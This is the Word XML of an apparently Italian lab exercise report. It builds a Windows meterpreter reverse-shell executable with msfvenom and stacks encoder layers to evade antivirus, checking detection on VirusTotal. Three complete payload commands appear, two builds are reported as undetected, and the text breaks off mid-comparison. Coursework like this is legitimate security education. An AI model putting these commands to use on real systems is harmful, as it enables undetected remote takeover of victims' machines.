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92687" w14:textId="395CF25D" w:rsidR="007C65EC" w:rsidRDefault="00A311EF" w:rsidP="007C65EC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>S9L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B2545E" w14:textId="2A863201" w:rsidR="00295CAE" w:rsidRDefault="00240364">
      <w:r w:rsidRPr="00240364">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05CCD24D" wp14:editId="1DF00D04">
            <wp:extent cx="4389120" cy="1880791"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2522552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55228" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4420265" cy="1894137"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00240364">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73120444" wp14:editId="5277D4D7">
            <wp:extent cx="4337913" cy="1402913"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:docPr id="10545684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68480" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4362820" cy="1410968"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C07545F" w14:textId="77777777" w:rsidR="00240364" w:rsidRDefault="00240364"/>
    <w:p w14:paraId="02ACB29A" w14:textId="172127A0" w:rsidR="00240364" w:rsidRDefault="00240364">
      <w:r>
        <w:t xml:space="preserve">Per completare l’obiettivo dell’esercizio di oggi ho avviato il tool </w:t>
      </w:r>
      <w:r w:rsidRPr="00965051">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e genero il mio malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B39BA" w14:textId="27A9F3E3" w:rsidR="00240364" w:rsidRDefault="00240364" w:rsidP="00240364">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>100.200</w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -a x86 --platform windows -e x86/shikata_ga_nai -i 100 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 200 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 138 -o polimorficommm.exe</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F64A9" w14:textId="1591AC65" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Primo </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> → payload reverse_tcp con </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> iterato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26958701" w14:textId="67E24FAD" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Pipe → codificato di nuovo con </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>countdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51690283" w14:textId="51E02CDF" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Pipe → di nuovo </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>38 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44922A90" w14:textId="7A195441" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t>Output finale in polimorficommm.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060F437" w14:textId="49328CDF" w:rsidR="00240364" w:rsidRDefault="00240364" w:rsidP="00240364">
      <w:r w:rsidRPr="00240364">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33531C48" wp14:editId="5B426567">
            <wp:extent cx="6120130" cy="416560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1422747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47826" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="416560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57660FFA" w14:textId="287DEE75" w:rsidR="00240364" w:rsidRDefault="00240364" w:rsidP="00240364">
      <w:r>
        <w:t>Dopo aver creato il malware controllo la rilevabilità tramite virus total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34BCF2" w14:textId="290753DA" w:rsidR="00965051" w:rsidRDefault="00965051" w:rsidP="00240364">
      <w:r w:rsidRPr="00965051">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="192893C3" wp14:editId="222829C2">
            <wp:extent cx="5018227" cy="2325317"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10241305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30537" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5069801" cy="2349215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E1947" w14:textId="77777777" w:rsidR="00965051" w:rsidRDefault="00965051" w:rsidP="00240364">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La scansione tramite virus total ha rivelato 8 rilevabilità da parte dei controlli di sicurezza. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F12B941" w14:textId="77777777" w:rsidR="00CA6988" w:rsidRDefault="00965051" w:rsidP="00240364">
      <w:r>
        <w:t xml:space="preserve">Il nostro scopo è quello di rendere il nostro malware irrilevabile da parte dei controlli degli antivirus quindi aumentiamo il numero di </w:t>
      </w:r>
      <w:r w:rsidR="00CA6988">
        <w:t xml:space="preserve">iterazioni. Le iterazioni non sono altro che </w:t>
      </w:r>
      <w:r w:rsidR="00CA6988" w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>layer</w:t>
      </w:r>
      <w:r w:rsidR="00CA6988">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00CA6988" w:rsidRPr="00CA6988">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>strati</w:t>
      </w:r>
      <w:r w:rsidR="00CA6988">
        <w:t xml:space="preserve">) di codifica. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D83EF1" w14:textId="66357578" w:rsidR="00965051" w:rsidRDefault="00CA6988" w:rsidP="00240364">
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>gni codifica cambia la struttura del binario, così le firme statiche diventano meno riconoscibili</w:t>
      </w:r>
      <w:r>
        <w:t>, rendendo difficile</w:t>
      </w:r>
      <w:r w:rsidR="003B7126">
        <w:t xml:space="preserve"> il </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reverse engineering manuale. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9AA1E" w14:textId="6EC1ACCC" w:rsidR="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00240364">
      <w:r>
        <w:t xml:space="preserve">Questa cosa ha anche degli effetti collaterali però perché ogni </w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>layer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> di codifica aumenta il peso del payload, avere tanti cicli di codifica può rallentare l’esecuzione perché all’avvio il payload deve decodificarsi più volte. E non sempre più iterazioni sono sintomo di offuscamento efficace, alle volte molti strati di </w:t>
      </w:r>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fanno insospettire gli antivirus per via del peso del file.</w:t>
      </w:r>
      <w:r w:rsidR="003B7126">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003B7126" w:rsidRPr="003B7126">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Il nostro payload attuale deve decodificarsi 938 volte prima di eseguire il vero shellcode</w:t>
      </w:r>
      <w:r w:rsidR="003B7126">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B4E9A" w14:textId="5A90D493" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Primo msfvenom → payload reverse_tcp con </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> iterato </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>300 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15731D20" w14:textId="65BAECC5" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Pipe → codificato di nuovo con </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>countdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>400 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C310A6C" w14:textId="297C4B01" w:rsidR="00CA6988" w:rsidRPr="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00CA6988">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> Pipe → di nuovo </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>238 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF2F9B" w14:textId="0C77DAB9" w:rsidR="00CA6988" w:rsidRDefault="00CA6988" w:rsidP="00240364">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> Output finale in polimorficommmV2.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209EDC43" w14:textId="2073FD03" w:rsidR="00965051" w:rsidRDefault="00965051" w:rsidP="00240364">
      <w:r w:rsidRPr="00965051">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CBE2F56" wp14:editId="24F45162">
            <wp:extent cx="6013094" cy="227721"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="11224894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89483" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6024309" cy="228146"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E758C8" w14:textId="26EF3205" w:rsidR="003B7126" w:rsidRDefault="003B7126" w:rsidP="00240364">
      <w:r>
        <w:t>Dopo aver creato un altro malware, aumentando le iterazioni</w:t>
      </w:r>
      <w:r w:rsidR="00624C32">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proviamo a farlo analizzare </w:t>
      </w:r>
      <w:r w:rsidR="00624C32">
        <w:t>nuovamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E120497" w14:textId="7599FCD1" w:rsidR="00965051" w:rsidRDefault="00624C32" w:rsidP="00240364">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F84C494" wp14:editId="021CBA61">
            <wp:extent cx="6012815" cy="3202302"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="11676517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51740" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6096616" cy="3246933"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151C3E5" w14:textId="73CF82E0" w:rsidR="00624C32" w:rsidRDefault="00624C32" w:rsidP="00240364">
      <w:r>
        <w:t xml:space="preserve">Il malware non è stato rivelato dalla scansione, ma per rendere più </w:t>
      </w:r>
      <w:r w:rsidR="007C65EC">
        <w:t xml:space="preserve">leggero l’eseguibile, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decido comunque di lavorare a un payload più leggero quindi provo con tre </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>encoders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> diversi</w:t>
      </w:r>
      <w:r w:rsidR="007C65EC">
        <w:t xml:space="preserve"> mantenendo le </w:t>
      </w:r>
      <w:r w:rsidR="007C65EC" w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iterazioni</w:t>
      </w:r>
      <w:r w:rsidR="007C65EC">
        <w:t xml:space="preserve"> più basse, ad esempio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B1414" w14:textId="749951CD" w:rsidR="00624C32" w:rsidRDefault="00D57A4A" w:rsidP="00240364">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D57A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST:192.168.200.100 LPORT:4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 100 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 200 -f raw | msfvenom -a x86 --platform windows -e x86/xor_poly -i 138 -o polimorficommmV3.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E45E7" w14:textId="77777777" w:rsidR="00D57A4A" w:rsidRPr="00CA6988" w:rsidRDefault="00D57A4A" w:rsidP="00D57A4A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Primo </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> → payload reverse_tcp con </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve"> iterato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C5C06" w14:textId="77777777" w:rsidR="00D57A4A" w:rsidRPr="00CA6988" w:rsidRDefault="00D57A4A" w:rsidP="00D57A4A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Pipe → codificato di nuovo con </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>countdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273395C" w14:textId="1E0BE2EB" w:rsidR="00D57A4A" w:rsidRPr="00CA6988" w:rsidRDefault="00D57A4A" w:rsidP="00D57A4A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">Pipe → </w:t>
      </w:r>
      <w:r w:rsidRPr="007C65EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xor_poly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>38 volte</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F76914" w14:textId="4C7954AA" w:rsidR="00D57A4A" w:rsidRDefault="00D57A4A" w:rsidP="00D57A4A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA6988">
        <w:t>Output finale in polimorficommm</w:t>
      </w:r>
      <w:r>
        <w:t>V3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6988">
        <w:t>.e</w:t>
      </w:r>
      <w:r>
        <w:t>xe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D5CB58" w14:textId="1D2C7EA5" w:rsidR="00D57A4A" w:rsidRDefault="00D57A4A" w:rsidP="00D57A4A">
      <w:r w:rsidRPr="00D57A4A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F03306B" wp14:editId="2AD4AECF">
            <wp:extent cx="6120130" cy="200660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="13396040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04047" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="200660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DDEA9" w14:textId="2EEE5A1D" w:rsidR="00D57A4A" w:rsidRDefault="00D57A4A" w:rsidP="00D57A4A">
      <w:r w:rsidRPr="00D57A4A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0903E607" wp14:editId="4C5DE561">
            <wp:extent cx="6468226" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="16370385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38595" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6708758" cy="1639948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F2F3C2" w14:textId="1666562B" w:rsidR="00D57A4A" w:rsidRDefault="00A778FA" w:rsidP="00240364">
      <w:r>
        <w:t xml:space="preserve">Nonostante il V2 e il V3 ritornano risultati positivi dopo la scansione di Virus Total, ma il V2 per quanto mantiene il requisito di non essere rilevabile, porta con sé un elevata dimensione dell’eseguibile quindi potrebbe insospettire l’antivirus. Il V3 al contrario, mantiene delle iterazioni moderate, di conseguenza il suo eseguibile è leggero e per questo si rivela il perfetto candidato. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBBE34F" w14:textId="77777777" w:rsidR="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:r>
        <w:t xml:space="preserve">In sostanza le differenze sono: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F7BBF" w14:textId="466C3F72" w:rsidR="00A778FA" w:rsidRDefault="00A778FA" w:rsidP="00A778FA">
      <w:r>
